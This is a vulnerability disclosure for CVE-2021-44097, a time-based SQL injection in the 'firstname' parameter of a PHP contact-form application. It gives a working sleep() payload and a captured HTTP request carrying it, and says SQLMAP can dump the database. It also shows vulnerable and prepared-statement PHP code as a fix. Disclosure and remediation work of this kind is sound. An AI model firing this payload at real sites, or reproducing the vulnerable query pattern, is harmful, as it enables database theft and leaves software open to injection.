CVE-2021-44097

Shubham Pandey
Mar 23, 2022


# Exploit Title: SQL injection vulnerability in EGavilan Media Contact-Form-With-Messages-Entry-Management 1.0 via "addMessage.php" that allows a remote attacker to compromise the application's SQL database.

# Exploit Author: Shubham Pandey

# Vendor: EGavilan Media

# Application Link: https://egavilanmedia.com/contact-form-with-messages-entry-management-with-php-and-mysql/

# Github Link: https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management

# Version: 1.0

# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44097

# CVE: CVE-2021-44097

What is SQL injection?

SQL injection is a class of web application vulnerability that lets an attacker interfere with the queries an application sends to its database. It can expose data the attacker would not normally be able to read, including records belonging to other users or anything else the application itself can access. In many cases the attacker can also modify or delete that data, permanently changing the application's content or behaviour.

Attack Vector:

By exploiting the login page parameters with a tool such as SQLMAP, an attacker can dump the entire database. The dumped data can compromise the confidentiality of users' personal, transaction and financial information, their session tokens and so on. The data obtained could also be publicly disclosed or used for competitive gain, leading to financial loss for the organization.

Vulnerable Parameter: "firstname"

Steps to Reproduce:

1. Send the payload `'%2b(select*from(select(sleep(20)))a)%2b'` in the vulnerable parameter and watch the response time: if the response arrives only after about 20 seconds, the application's SQL database is executing the injected query.

2. Login page request (captured, with the payload in `firstname`):

```http
POST /Contact-Form-With-Messages-Entry-Management-master/process/contacts/addMessage.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 139
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/Contact-Form-With-Messages-Entry-Management-master/view/contact.php
Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5

firstname=test'%2b(select*from(select(sleep(20)))a)%2b'&lastname=test&email=sdsada%40gmail.com&phone=123123131&subject=test&message=rtesdas
```

3. The web server accepts the payload; with a tool such as "Sqlmap" it can be confirmed that the payload is executed and the database can be compromised.
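As an added example (not the project's own code), a hypothetical `addMessage.php` handler in both forms: the string-built INSERT that the time-based payload above abuses, and the same insert rewritten with a `mysqli` prepared statement so the payload is stored as plain text. The table name, column names and connection details are assumptions.

```php
<?php
// Added example, not the EGavilan Media code. Field, table and column names
// are assumptions; the project's real schema may differ.

// Before: the INSERT is assembled by string concatenation. The single quote in
// firstname=test'+(select*from(select(sleep(20)))a)+' closes the literal, so
// MySQL evaluates the rest of the input, which is why the reply takes ~20 s.
function addMessageVulnerable(mysqli $db, array $post): bool {
    $sql = "INSERT INTO messages (firstname, lastname, email, phone, subject, message)
            VALUES ('{$post['firstname']}', '{$post['lastname']}', '{$post['email']}',
                    '{$post['phone']}', '{$post['subject']}', '{$post['message']}')";
    return $db->query($sql) !== false;
}

// After: a prepared statement. Each field is sent as a bound parameter, so the
// same payload is stored verbatim as a first name and never reaches the SQL parser.
function addMessageSafe(mysqli $db, array $post): bool {
    $fields = ['firstname', 'lastname', 'email', 'phone', 'subject', 'message'];
    foreach ($fields as $f) {
        if (!isset($post[$f]) || !is_string($post[$f])) {
            return false;            // reject missing or non-scalar input
        }
    }
    if (filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        return false;                // input validation, separate from SQL safety
    }
    $stmt = $db->prepare(
        'INSERT INTO messages (firstname, lastname, email, phone, subject, message)
         VALUES (?, ?, ?, ?, ?, ?)'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ssssss', $post['firstname'], $post['lastname'], $post['email'],
                      $post['phone'], $post['subject'], $post['message']);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Usage (assumed credentials and database name):
// $db = new mysqli('localhost', 'user', 'pass', 'contacts');
// header('Content-Type: application/json');
// echo json_encode(['ok' => addMessageSafe($db, $_POST)]);
```

With the prepared statement in place, the time-based probe no longer delays the response, which is the check to run after deploying the fix.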

Author: https://www.linkedin.com/in/shubham-pandey-10704014b/
